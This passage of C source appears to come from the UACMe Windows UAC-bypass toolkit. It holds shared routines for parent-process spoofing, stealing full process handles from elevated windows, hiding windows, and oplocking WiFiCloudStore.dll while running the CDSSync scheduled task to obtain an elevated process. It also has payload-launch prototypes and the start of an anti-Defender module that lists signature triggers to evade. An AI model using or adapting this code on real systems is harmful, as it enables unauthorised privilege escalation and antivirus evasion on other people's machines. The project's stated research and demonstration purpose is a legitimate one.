szBuffer, MAX_PATH, ReferencedDomains->Domains[0].Name.Buffer, ReferencedDomains->Domains[0].Name.Length / sizeof(WCHAR)); _strcat(lpReport, TEXT("\r\n")); _strcat(lpReport, szBuffer); _strcat(lpReport, TEXT("\\")); } if (Names != NULL) { szBuffer[0] = 0; _strncpy( szBuffer, MAX_PATH, Names->Name.Buffer, Names->Name.Length / sizeof(WCHAR)); _strcat(lpReport, szBuffer); } } if (ReferencedDomains) LsaFreeMemory(ReferencedDomains); if (Names) LsaFreeMemory(Names); LsaClose(PolicyHandle); } } ucmxHeapFree(ptu); } } // // Session info // LengthNeeded = 0; _strcpy(szBuffer, TEXT("\r\nSessionId=")); ultostr(SessionId, _strend(szBuffer)); _strcat(lpReport, szBuffer); _strcat(lpReport, TEXT("\r\nInteractive Winstation=")); if (ucmIsUserWinstaInteractive()) _strcat(lpReport, TEXT("yes")); else _strcat(lpReport, TEXT("no")); NtClose(hToken); } // // 4. 
    // Wow64
    //
    RtlSecureZeroMemory(&pebi, sizeof(pebi));
    pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);

    //
    // ProcessBasicInformation fills the extended structure when the buffer
    // is exactly sizeof(PROCESS_EXTENDED_BASIC_INFORMATION) with Size set.
    //
    status = NtQueryInformationProcess(
        NtCurrentProcess(),
        ProcessBasicInformation,
        &pebi,
        sizeof(pebi),
        NULL);

    if (NT_SUCCESS(status)) {
        _strcpy(szBuffer, TEXT("\r\nWOW64 Enabled="));
        ultostr(pebi.IsWow64Process, _strend(szBuffer));
        _strcat(lpReport, szBuffer);
    }

    if (ReturnData == FALSE) {
        MessageBox(
            GetDesktopWindow(),
            lpReport,
            GetCommandLine(),
            MB_ICONINFORMATION);

        ucmxHeapFree(lpReport);
        lpReport = NULL;
    }

    return lpReport;
}

/*
* ucmDestroyRuntimeInfo
*
* Purpose:
*
* Release memory allocated by ucmQueryRuntimeInfo if ReturnData flag used.
*
*/
BOOLEAN ucmDestroyRuntimeInfo(
    _In_ LPWSTR RuntimeInfo)
{
    return ucmxHeapFree((PVOID)RuntimeInfo);
}

/*
* ucmIsUserWinstaInteractive
*
* Purpose:
*
* Return TRUE if current user operates on Winstation with visible surfaces, FALSE otherwise.
*
* Defaults to TRUE, so a winstation that cannot be queried is reported as interactive.
*
*/
BOOL ucmIsUserWinstaInteractive(
    VOID
)
{
    BOOL bResult = TRUE;
    USEROBJECTFLAGS uof;
    HWINSTA hWinStation;

    //
    // Open current winstation.
    //
    hWinStation = GetProcessWindowStation();
    if (hWinStation) {

        //
        // Query winstation flags.
        //
        if (GetUserObjectInformation(
            hWinStation,
            UOI_FLAGS,
            &uof,
            sizeof(USEROBJECTFLAGS),
            NULL))
        {
            //
            // Does the winstation have visible surfaces?
            //
            if ((uof.dwFlags & WSF_VISIBLE) == 0)
                bResult = FALSE;
        }
    }

    return bResult;
}

/*
* ucmIsUserHasInteractiveSid
*
* Purpose:
*
* pbInteractiveSid will be set to TRUE if current user has interactive sid, FALSE otherwise.
*
* Function return operation status code.
* */ NTSTATUS ucmIsUserHasInteractiveSid( _In_ HANDLE hToken, _Out_ PBOOL pbInteractiveSid) { BOOL IsInteractiveSid = FALSE; NTSTATUS status = STATUS_UNSUCCESSFUL; ULONG LengthNeeded = 0; DWORD i; SID_IDENTIFIER_AUTHORITY SidAuth = SECURITY_NT_AUTHORITY; PSID InteractiveSid = NULL; PTOKEN_GROUPS groupInfo = NULL; do { status = NtQueryInformationToken( hToken, TokenGroups, NULL, 0, &LengthNeeded); if (status != STATUS_BUFFER_TOO_SMALL) break; groupInfo = (PTOKEN_GROUPS)ucmxHeapAlloc(LengthNeeded); if (groupInfo == NULL) break; status = NtQueryInformationToken( hToken, TokenGroups, groupInfo, LengthNeeded, &LengthNeeded); if (!NT_SUCCESS(status)) break; status = RtlAllocateAndInitializeSid( &SidAuth, 1, SECURITY_INTERACTIVE_RID, 0, 0, 0, 0, 0, 0, 0, &InteractiveSid); if (!NT_SUCCESS(status)) break; for (i = 0; i < groupInfo->GroupCount; i++) { if (RtlEqualSid( InteractiveSid, groupInfo->Groups[i].Sid)) { IsInteractiveSid = TRUE; break; } } } while (FALSE); if (groupInfo != NULL) ucmxHeapFree(groupInfo); if (pbInteractiveSid) *pbInteractiveSid = IsInteractiveSid; if (InteractiveSid) RtlFreeSid(InteractiveSid); return status; } /* * ucmIsLocalSystem * * Purpose: * * pbResult will be set to TRUE if current account is run by system user, FALSE otherwise. * * Function return operation status code. 
* */ NTSTATUS ucmIsLocalSystem( _Out_ PBOOL pbResult) { BOOL bResult = FALSE; NTSTATUS status = STATUS_UNSUCCESSFUL; HANDLE hToken = NULL; ULONG LengthNeeded = 0; PSID SystemSid = NULL; PTOKEN_USER ptu = NULL; SID_IDENTIFIER_AUTHORITY NtAuth = SECURITY_NT_AUTHORITY; status = NtOpenProcessToken( NtCurrentProcess(), TOKEN_QUERY, &hToken); if (NT_SUCCESS(status)) { status = NtQueryInformationToken( hToken, TokenUser, NULL, 0, &LengthNeeded); if (status == STATUS_BUFFER_TOO_SMALL) { ptu = (PTOKEN_USER)ucmxHeapAlloc(LengthNeeded); if (ptu) { status = NtQueryInformationToken( hToken, TokenUser, ptu, LengthNeeded, &LengthNeeded); if (NT_SUCCESS(status)) { status = RtlAllocateAndInitializeSid( &NtAuth, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &SystemSid); if (NT_SUCCESS(status)) { bResult = RtlEqualSid(ptu->User.Sid, SystemSid); RtlFreeSid(SystemSid); } } ucmxHeapFree(ptu); } else { status = STATUS_INSUFFICIENT_RESOURCES; } } //STATUS_BUFFER_TOO_SMALL NtClose(hToken); } if (pbResult) *pbResult = bResult; return status; } /* * ucmGetProcessElevationType * * Purpose: * * Returns process elevation type. * */ BOOL ucmGetProcessElevationType( _In_opt_ HANDLE ProcessHandle, _Out_ TOKEN_ELEVATION_TYPE * lpType ) { HANDLE hToken = NULL, processHandle = ProcessHandle; NTSTATUS Status; ULONG BytesRead = 0; TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault; if (ProcessHandle == NULL) { processHandle = GetCurrentProcess(); } Status = NtOpenProcessToken(processHandle, TOKEN_QUERY, &hToken); if (NT_SUCCESS(Status)) { Status = NtQueryInformationToken(hToken, TokenElevationType, &TokenType, sizeof(TOKEN_ELEVATION_TYPE), &BytesRead); NtClose(hToken); } if (lpType) *lpType = TokenType; return (NT_SUCCESS(Status)); } /* * ucmIsProcessElevated * * Purpose: * * Returns process elevation state. 
* */ NTSTATUS ucmIsProcessElevated( _In_ ULONG ProcessId, _Out_ PBOOL Elevated) { NTSTATUS Status; ULONG Dummy; HANDLE ProcessHandle, TokenHandle; CLIENT_ID ClientId; TOKEN_ELEVATION TokenInfo; OBJECT_ATTRIBUTES ObAttr = RTL_INIT_OBJECT_ATTRIBUTES(NULL, 0); ClientId.UniqueProcess = UlongToHandle(ProcessId); ClientId.UniqueThread = NULL; if (Elevated) *Elevated = FALSE; Status = NtOpenProcess(&ProcessHandle, MAXIMUM_ALLOWED, &ObAttr, &ClientId); if (NT_SUCCESS(Status)) { Status = NtOpenProcessToken(ProcessHandle, TOKEN_QUERY, &TokenHandle); if (NT_SUCCESS(Status)) { TokenInfo.TokenIsElevated = 0; Status = NtQueryInformationToken(TokenHandle, TokenElevation, &TokenInfo, sizeof(TOKEN_ELEVATION), &Dummy); if (NT_SUCCESS(Status)) { if (Elevated) *Elevated = (TokenInfo.TokenIsElevated > 0); } NtClose(TokenHandle); } NtClose(ProcessHandle); } return Status; } /* * ucmSetEnvironmentVariable * * Purpose: * * SetEnvironmentVariable replacement. * */ BOOL ucmSetEnvironmentVariable( _In_ LPCWSTR lpName, _In_ LPCWSTR lpValue ) { NTSTATUS ntStatus; UNICODE_STRING Name, Value; ntStatus = RtlInitUnicodeStringEx(&Name, lpName); if (!NT_SUCCESS(ntStatus)) { return FALSE; } if (lpValue) { ntStatus = RtlInitUnicodeStringEx(&Value, lpValue); if (!NT_SUCCESS(ntStatus)) { return FALSE; } ntStatus = RtlSetEnvironmentVariable(NULL, &Name, &Value); } else { ntStatus = RtlSetEnvironmentVariable(NULL, &Name, NULL); } return (NT_SUCCESS(ntStatus)); } // // OpLocks from R41N3RZUF477. // /* * ucmxWaitForOpLockThread * * Purpose: * * Thread procedure to wait for oplock notification. * */ DWORD WINAPI ucmxWaitForOpLockThread( _In_ LPVOID p) { DWORD bret = 0; POPLOCK_FILE_CONTEXT ofc = (POPLOCK_FILE_CONTEXT)p; if (p == NULL) { return 1; } bret = 0; if (!GetOverlappedResult(ofc->FileHandle, &ofc->Overlapped, &bret, TRUE)) { return 1; } return 0; } /* * ucmWaitForOpLock * * Purpose: * * Wait for oplock notification with timeout. 
* Returns TRUE if oplock was successfully acquired and signaled, FALSE otherwise.
*
*/
BOOL ucmWaitForOpLock(
    _In_ POPLOCK_FILE_CONTEXT ofc,
    _In_ DWORD timeout
)
{
    BOOL bResult = FALSE;
    DWORD exitcode = 0;
    HANDLE thread = NULL;

    if (ofc == NULL || ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {
        return FALSE;
    }

    //
    // GetOverlappedResult blocks until the oplock breaks, so the wait runs
    // on a helper thread to get a timeout.
    //
    thread = CreateThread(NULL,
        0x1000,
        (LPTHREAD_START_ROUTINE)ucmxWaitForOpLockThread,
        (LPVOID)ofc,
        STACK_SIZE_PARAM_IS_A_RESERVATION,
        NULL);

    if (thread == NULL)
        return FALSE;

    do {
        if (WaitForSingleObject(thread, timeout) != WAIT_OBJECT_0) {
            TerminateThread(thread, 1);
            break;
        }

        if (GetExitCodeThread(thread, &exitcode)) {
            bResult = (exitcode == 0);
        }

    } while (FALSE);

    CloseHandle(thread);
    return bResult;
}

/*
* ucmReleaseOpLock
*
* Purpose:
*
* Close oplock event and file handles. The handles are reset afterwards so a
* second call on the same context (ucmStartBackupLockedElevatedProcess already
* releases it when CreateProcess fails, and ucmLaunchPayload3 releases it again
* when FileHandle is not INVALID_HANDLE_VALUE) does not close them twice.
*
*/
BOOL ucmReleaseOpLock(
    _In_ POPLOCK_FILE_CONTEXT ofc
)
{
    if (ofc == NULL) {
        return FALSE;
    }

    if (ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {
        return FALSE;
    }

    if (ofc->Overlapped.hEvent) {
        CloseHandle(ofc->Overlapped.hEvent);
        ofc->Overlapped.hEvent = NULL;
    }

    if (ofc->FileHandle != INVALID_HANDLE_VALUE && ofc->FileHandle != NULL) {
        CloseHandle(ofc->FileHandle);
        ofc->FileHandle = INVALID_HANDLE_VALUE;
    }

    return TRUE;
}

/*
* ucmOpLockFile
*
* Purpose:
*
* Open file and request an oplock on it: level 1 when Exclusive, otherwise a
* read/handle caching oplock. The request completes asynchronously; the break
* is observed through ofc->Overlapped.
*
*/
BOOL ucmOpLockFile(
    _In_ LPCWSTR FileName,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ DWORD ShareMode,
    _In_ BOOL Exclusive,
    _In_ POPLOCK_FILE_CONTEXT ofc
)
{
    DWORD bret = 0;
    REQUEST_OPLOCK_INPUT_BUFFER roib;
    REQUEST_OPLOCK_OUTPUT_BUFFER roob;
    DWORD flags = 0;

    if (FileName == NULL || ofc == NULL) {
        return FALSE;
    }

    if (ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {
        return FALSE;
    }

    RtlSecureZeroMemory(&ofc->Overlapped, sizeof(OVERLAPPED));
    RtlSecureZeroMemory(&roib, sizeof(roib));
    RtlSecureZeroMemory(&roob, sizeof(roob));

    roib.StructureLength = sizeof(roib);
    roib.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
    roib.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
    roib.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;

    roob.StructureLength = sizeof(roob);
    roob.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;

    ofc->Overlapped.hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
    if (ofc->Overlapped.hEvent == NULL) {
        return FALSE;
    }

    flags = FILE_FLAG_OVERLAPPED;
    if (GetFileAttributes(FileName) & FILE_ATTRIBUTE_DIRECTORY) {
        flags
    |= FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT;
    }

    if (DesiredAccess == 0) {
        DesiredAccess = GENERIC_READ;
    }

    ofc->FileHandle = CreateFile(FileName, DesiredAccess, ShareMode, NULL,
        OPEN_EXISTING, flags, NULL);
    if (ofc->FileHandle == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    if (Exclusive) {
        bret = 0;
        DeviceIoControl(ofc->FileHandle, FSCTL_REQUEST_OPLOCK_LEVEL_1,
            NULL, 0, NULL, 0, &bret, &ofc->Overlapped);
    }
    else {
        DeviceIoControl(ofc->FileHandle, FSCTL_REQUEST_OPLOCK,
            &roib, sizeof(roib), &roob, sizeof(roob), NULL, &ofc->Overlapped);
    }

    if (GetLastError() != ERROR_IO_PENDING) {
        return FALSE;
    }

    return TRUE;
}

//
// OpLocks from R41N3RZUF477 end.
//

/*
* ucmxHideMainWindowCallback
*
* Purpose:
*
* EnumWindows callback to hide windows belonging to current process.
*
*/
BOOL ucmxHideMainWindowCallback(
    _In_ HWND hwnd,
    _In_ LPARAM lParam
)
{
    DWORD pid = 0;

    UNREFERENCED_PARAMETER(lParam);

    GetWindowThreadProcessId(hwnd, &pid);
    if (pid == 0)
        return TRUE;
    if (GetCurrentProcessId() != pid)
        return TRUE;
    if (GetWindow(hwnd, GW_OWNER))
        return TRUE;
    if (!IsWindowVisible(hwnd))
        return TRUE;

    ShowWindow(hwnd, SW_HIDE);
    return TRUE;
}

/*
* ucmHideMainWindow
*
* Purpose:
*
* Hide current process windows.
*
*/
VOID ucmHideMainWindow(
    VOID
)
{
    EnumWindows((WNDENUMPROC)ucmxHideMainWindowCallback, 0);
}

/*
* ucmCheckUIAccessPermissions
*
* Purpose:
*
* Check if current process token has UIAccess flag and high integrity level.
*
*/
BOOL ucmCheckUIAccessPermissions(
    VOID)
{
    BOOL bResult = FALSE;
    HANDLE hToken = NULL;
    BYTE tmlbuf[sizeof(TOKEN_MANDATORY_LABEL) + sizeof(SID)];
    TOKEN_MANDATORY_LABEL* tml = (TOKEN_MANDATORY_LABEL*)&tmlbuf[0];
    DWORD UIAccessFlag = 0;
    DWORD* pdwIntegrityLevel = NULL;
    DWORD retLen = 0;

    do {
        if (!NT_SUCCESS(NtOpenProcessToken(
            NtCurrentProcess(),
            MAXIMUM_ALLOWED,
            &hToken)))
        {
            break;
        }

        retLen = sizeof(UIAccessFlag);
        if (!GetTokenInformation(hToken, TokenUIAccess, &UIAccessFlag,
            sizeof(UIAccessFlag), &retLen))
        {
            break;
        }

        if (UIAccessFlag == 0)
            break;

        retLen = sizeof(tmlbuf);
        if (!GetTokenInformation(hToken, TokenIntegrityLevel, tml, retLen, &retLen))
            break;

        pdwIntegrityLevel = GetSidSubAuthority(tml->Label.Sid, 0);
        if (*pdwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
            break;

        bResult = TRUE;

    } while (FALSE);

    if (hToken)
        NtClose(hToken);

    return bResult;
}

typedef HANDLE(WINAPI* pfnGetProcessHandleFromHwnd)(HWND hwnd);

/*
* ucmCallGetProcessHandleFromHwnd
*
* Purpose:
*
* Wrapper for oleacc!GetProcessHandleFromHwnd.
*
*/
HANDLE ucmCallGetProcessHandleFromHwnd(
    _In_ HWND hwnd
)
{
    HANDLE process = NULL;
    HMODULE oleacc = NULL;
    pfnGetProcessHandleFromHwnd pGetProcessHandleFromHwnd = NULL;

    oleacc = LoadLibrary(L"oleacc.dll");
    if (oleacc) {
        pGetProcessHandleFromHwnd = (pfnGetProcessHandleFromHwnd)GetProcAddress(oleacc,
            "GetProcessHandleFromHwnd");
        if (pGetProcessHandleFromHwnd) {
            process = pGetProcessHandleFromHwnd(hwnd);
        }
        FreeLibrary(oleacc);
    }

    return process;
}

/*
* ucmCreateProcessWithParent
*
* Purpose:
*
* CreateProcess with parent process set.
*
*/
BOOL ucmCreateProcessWithParent(
    _In_ LPWSTR lpCommandLine,
    _In_ HANDLE hParent,
    _In_ DWORD dwFlags,
    _In_ WORD wShow,
    _In_ PROCESS_INFORMATION* pi
)
{
    SIZE_T ptsize = 0;
    STARTUPINFOEX si;
    LPPROC_THREAD_ATTRIBUTE_LIST ptal = NULL;
    BOOL bResult = FALSE;

    if (pi) {
        InitializeProcThreadAttributeList(NULL, 1, 0, &ptsize);
        ptal = (LPPROC_THREAD_ATTRIBUTE_LIST)ucmxHeapAlloc(ptsize);
        if (ptal) {
            RtlSecureZeroMemory(&si, sizeof(si));
            si.StartupInfo.cb = sizeof(si);
            si.StartupInfo.dwFlags = STARTF_FORCEOFFFEEDBACK | STARTF_USESHOWWINDOW;
            si.StartupInfo.wShowWindow = wShow;

            if (InitializeProcThreadAttributeList(ptal, 1, 0, &ptsize)) {
                if (UpdateProcThreadAttribute(ptal, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                    &hParent, sizeof(HANDLE), NULL, NULL))
                {
                    si.lpAttributeList = ptal;
                    bResult = CreateProcess(NULL, lpCommandLine, NULL, NULL, FALSE,
                        EXTENDED_STARTUPINFO_PRESENT | dwFlags, NULL, NULL,
                        (STARTUPINFO*)&si, pi);
                }
                DeleteProcThreadAttributeList(ptal);
            }
            ucmxHeapFree(ptal);
        }
    }

    return bResult;
}

/*
* ucmGetHwndFullProcessHandle
*
* Purpose:
*
* Duplicate process handle from hwnd.
*
*/
HANDLE ucmGetHwndFullProcessHandle(
    _In_ HWND hwnd
)
{
    HANDLE hProcess = NULL;
    HANDLE hDuplicate = NULL;

    hProcess = ucmCallGetProcessHandleFromHwnd(hwnd);
    if (hProcess) {
        DuplicateHandle(hProcess, (HANDLE)-1, (HANDLE)-1, &hDuplicate,
            0, FALSE, DUPLICATE_SAME_ACCESS);
        CloseHandle(hProcess);
    }

    return hDuplicate;
}

/*
* ucmxEnumElevatedWindows
*
* Purpose:
*
* EnumWindows callback to find first window belonging to elevated process.
*
*/
BOOL ucmxEnumElevatedWindows(
    _In_ HWND hwnd,
    _In_ LPARAM lParam)
{
    DWORD dwPid = 0;
    HANDLE hProcess = NULL;
    HANDLE hToken = NULL;
    DWORD tkElvType = 0;
    DWORD retLen = 0;

    GetWindowThreadProcessId(hwnd, &dwPid);
    if (dwPid == 0) {
        // Continue to next window.
        return TRUE;
    }

    hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, dwPid);
    if (hProcess == NULL) {
        // Continue to next window.
        return TRUE;
    }

    if (!OpenProcessToken(hProcess, MAXIMUM_ALLOWED, &hToken)) {
        // Continue to next window.
        CloseHandle(hProcess);
        return TRUE;
    }
    CloseHandle(hProcess);

    retLen = 0;
    if (!GetTokenInformation(hToken, TokenElevationType, &tkElvType,
        sizeof(tkElvType), &retLen))
    {
        // Continue to next window.
        CloseHandle(hToken);
        return TRUE;
    }
    CloseHandle(hToken);

    if (tkElvType == TokenElevationTypeFull) {
        //
        // Stop enumeration and return hwnd.
        //
        *(HWND*)lParam = hwnd;
        return FALSE;
    }

    return TRUE;
}

/*
* ucmFindFirstElevatedWindow
*
* Purpose:
*
* Find first elevated window.
*
*/
HWND ucmFindFirstElevatedWindow(
    VOID
)
{
    HWND hwnd = NULL;
    EnumWindows((WNDENUMPROC)ucmxEnumElevatedWindows, (LPARAM)&hwnd);
    return hwnd;
}

/*
* ucmStartBackupLockedElevatedProcess
*
* Purpose:
*
* Create oplock on system file and run elevated task through schtasks.exe.
*
*/
BOOL ucmStartBackupLockedElevatedProcess(
    _In_ POPLOCK_FILE_CONTEXT ofc
)
{
    BOOL bResult = FALSE;
    WCHAR szTaskCmdLine[MAX_PATH * 4];
    WCHAR szOplockPath[MAX_PATH * 2];
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    DWORD dwExitCode = 1;

    if (ofc == NULL || ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {
        return FALSE;
    }

    RtlSecureZeroMemory(szOplockPath, sizeof(szOplockPath));
    ucmxQuerySystemDirectory(szOplockPath, FALSE);
    _strcpy(szTaskCmdLine, szOplockPath);
    _strcat(szOplockPath, L"WiFiCloudStore.dll");
    _strcat(szTaskCmdLine, L"\\schtasks.exe /RUN /TN \"\\Microsoft\\Windows\\WlanSvc\\CDSSync\" /I");

    if (!ucmOpLockFile(szOplockPath, GENERIC_READ,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, TRUE, ofc))
    {
        return FALSE;
    }

    RtlSecureZeroMemory(&pi, sizeof(pi));
    RtlSecureZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_FORCEOFFFEEDBACK | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;

    if (!CreateProcess(NULL, szTaskCmdLine, NULL, NULL, FALSE, CREATE_NEW_CONSOLE,
        NULL, NULL, &si, &pi))
    {
        ucmReleaseOpLock(ofc);
        return FALSE;
    }

    CloseHandle(pi.hThread);

    if (WaitForSingleObject(pi.hProcess, 3000) == WAIT_OBJECT_0) {
        if (GetExitCodeProcess(pi.hProcess, &dwExitCode)) {
            bResult = (dwExitCode == 0);
        }
    }
    CloseHandle(pi.hProcess);

    if (!bResult) {
        ucmReleaseOpLock(ofc);
    }

    return bResult;
}

================================================
FILE: Source/Shared/util.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2017 - 2025
*
*  TITLE:       UTIL.H
*
*  VERSION:     3.68
*
*  DATE:        07 Mar 2025
*
*  Global support routines header file shared between payload dlls.
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

typedef struct _UACME_PARAM_BLOCK {
    ULONG Crc32;
    ULONG SessionId;
    ULONG AkagiFlag;
    WCHAR szParameter[MAX_PATH + 1];
    WCHAR szDesktop[MAX_PATH + 1];
    WCHAR szWinstation[MAX_PATH + 1];
    WCHAR szSignalObject[MAX_PATH + 1];
} UACME_PARAM_BLOCK, * PUACME_PARAM_BLOCK;

typedef BOOL(WINAPI* PFNCREATEPROCESSW)(
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation);

typedef BOOL(WINAPI* PFNCREATEPROCESSASUSERW)(
    _In_opt_ HANDLE hToken,
    _In_opt_ LPCWSTR lpApplicationName,
    _Inout_opt_ LPWSTR lpCommandLine,
    _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,
    _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
    _In_ BOOL bInheritHandles,
    _In_ DWORD dwCreationFlags,
    _In_opt_ LPVOID lpEnvironment,
    _In_opt_ LPCWSTR lpCurrentDirectory,
    _In_ LPSTARTUPINFOW lpStartupInfo,
    _Out_ LPPROCESS_INFORMATION lpProcessInformation);

typedef struct _OBJSCANPARAM {
    PWSTR Buffer;
    SIZE_T BufferSize;
} OBJSCANPARAM, * POBJSCANPARAM;

typedef struct _OPLOCK_FILE_CONTEXT {
    DWORD Length;
    HANDLE FileHandle;
    OVERLAPPED Overlapped;
} OPLOCK_FILE_CONTEXT, * POPLOCK_FILE_CONTEXT;

VOID ucmBinTextEncode(
    _In_ unsigned __int64 x,
    _Inout_ wchar_t* s);

VOID ucmGenerateSharedObjectName(
    _In_ WORD ObjectId,
    _Inout_ LPWSTR lpBuffer);

BOOLEAN ucmPrivilegeEnabled(
    _In_ HANDLE hToken,
    _In_ ULONG Privilege);

NTSTATUS ucmCreateSyncMutant(
    _Out_ PHANDLE phMutant);

BOOLEAN ucmIsProcess32bit(
    _In_ HANDLE hProcess);

DWORD ucmGetHashForString(
    _In_ char* s);

LPVOID ucmGetProcedureAddressByHash(
    _In_ PVOID ImageBase,
    _In_ DWORD ProcedureHash);

VOID ucmGetStartupInfo(
    _In_ LPSTARTUPINFOW lpStartupInfo);

DWORD ucmExpandEnvironmentStrings(
    _In_ LPCWSTR lpSrc,
    _Out_writes_to_opt_(nSize, return) LPWSTR lpDst,
    _In_ DWORD nSize);

PVOID ucmGetSystemInfo(
    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass);

BOOL ucmLaunchPayload(
    _In_opt_ LPWSTR pszPayload,
    _In_opt_ DWORD cbPayload);

BOOL ucmLaunchPayloadEx(
    _In_ PFNCREATEPROCESSW pCreateProcess,
    _In_opt_ LPWSTR pszPayload,
    _In_opt_ DWORD cbPayload);

BOOL ucmLaunchPayload2(
    _In_ PFNCREATEPROCESSASUSERW pCreateProcessAsUser,
    _In_ BOOL bIsLocalSystem,
    _In_ ULONG SessionId,
    _In_opt_ LPWSTR pszPayload,
    _In_opt_ DWORD cbPayload);

BOOL ucmLaunchPayload3(
    _In_opt_ LPWSTR pszPayload,
    _In_opt_ DWORD cbPayload);

LPWSTR ucmQueryRuntimeInfo(
    _In_ BOOL ReturnData);

BOOLEAN ucmDestroyRuntimeInfo(
    _In_ LPWSTR RuntimeInfo);

BOOL ucmIsUserWinstaInteractive(
    VOID);

NTSTATUS ucmIsUserHasInteractiveSid(
    _In_ HANDLE hToken,
    _Out_ PBOOL pbInteractiveSid);

NTSTATUS ucmIsLocalSystem(
    _Out_ PBOOL pbResult);

HANDLE ucmOpenAkagiNamespace(
    VOID);

_Success_(return == TRUE)
BOOL ucmReadSharedParameters(
    _Out_ UACME_PARAM_BLOCK * SharedParameters);

VOID ucmSetCompletion(
    _In_ LPWSTR lpEvent);

BOOL ucmGetProcessElevationType(
    _In_opt_ HANDLE ProcessHandle,
    _Out_ TOKEN_ELEVATION_TYPE * lpType);

NTSTATUS ucmIsProcessElevated(
    _In_ ULONG ProcessId,
    _Out_ PBOOL Elevated);

PLARGE_INTEGER ucmFormatTimeOut(
    _Out_ PLARGE_INTEGER TimeOut,
    _In_ DWORD Milliseconds);

VOID ucmSleep(
    _In_ DWORD Milliseconds);

BOOL ucmSetEnvironmentVariable(
    _In_ LPCWSTR lpName,
    _In_ LPCWSTR lpValue);

BOOL ucmOpLockFile(
    _In_ LPCWSTR FileName,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ DWORD ShareMode,
    _In_ BOOL Exclusive,
    _In_ POPLOCK_FILE_CONTEXT ofc);

BOOL ucmReleaseOpLock(
    _In_ POPLOCK_FILE_CONTEXT ofc);

BOOL ucmWaitForOpLock(
    _In_ POPLOCK_FILE_CONTEXT ofc,
    _In_ DWORD timeout);

VOID ucmHideMainWindow(
    VOID);

BOOL ucmCheckUIAccessPermissions(
    VOID);

HANDLE ucmCallGetProcessHandleFromHwnd(
    _In_ HWND hwnd);

BOOL ucmCreateProcessWithParent(
    _In_ LPWSTR lpCommandLine,
    _In_ HANDLE hParent,
    _In_ DWORD dwFlags,
    _In_ WORD wShow,
    _In_ PROCESS_INFORMATION * pi);

HANDLE ucmGetHwndFullProcessHandle(
    _In_ HWND hwnd);

HWND ucmFindFirstElevatedWindow(
    VOID);

BOOL ucmStartBackupLockedElevatedProcess(
    _In_ POPLOCK_FILE_CONTEXT ofc);

#ifdef _DEBUG
#define ucmDbgMsg(Message) OutputDebugString(Message)
#else
#define ucmDbgMsg(Message)
#endif

================================================
FILE: Source/Shared/windefend.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2026
*
*  TITLE:       WINDEFEND.C
*
*  VERSION:     3.69
*
*  DATE:        12 Feb 2026
*
*  MSE / Windows Defender anti-emulation part.
*
*  WARNING: Kernel32/ntdll only dependencies.
*
*  Short FAQ:
*
*  Q: Why is this module included in UACMe?
*     I thought this is a demonstrator tool, not real malware.
*
*  A: Windows Defender is the default AV software installed on every Windows
*     since Windows 8. Because some lazy malware authors copy-pasted the
*     whole UACMe project into their crappiest malware, Windows Defender has
*     several signatures to detect UACMe and its components.
*     Example of a WinDefend signature: Bampeass. We cannot be prevented by this,
*     as this demonstrator must be running on the newest Windows OS versions.
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "shared.h"

#pragma warning(push)
#pragma warning(disable: 4055)
#pragma warning(disable: 4152)

/*
WD Signatures

Trojan:Win64/Bampeass.A

Triggers:

[ U C M ] W u s a f a i l e d c o p y H i b i k i
% t e m p % \ H i b i k i . d l l
E l e v a t i o n : A d m i n i s t r a t o r ! n e w : { 4 D 1 1 1 E 0 8 - C B F 7 - 4 f 1 2 - A 9 2 6 - 2 C 7 9 2 0 A F 5 2 F C }
U A C M e i n j e c t e d , F u b u k i a t y o u r s e r v i c e

Trojan:Win64/Bampeass.B

Triggers:

UACMe injected, Hibiki at your service.
ucmLoadCallback, dll load %ws, DllBase = %

Trojan:Win64/Bampeass.C

Triggers:

ucmLoadCallback, dll load %ws, DllBase = %p
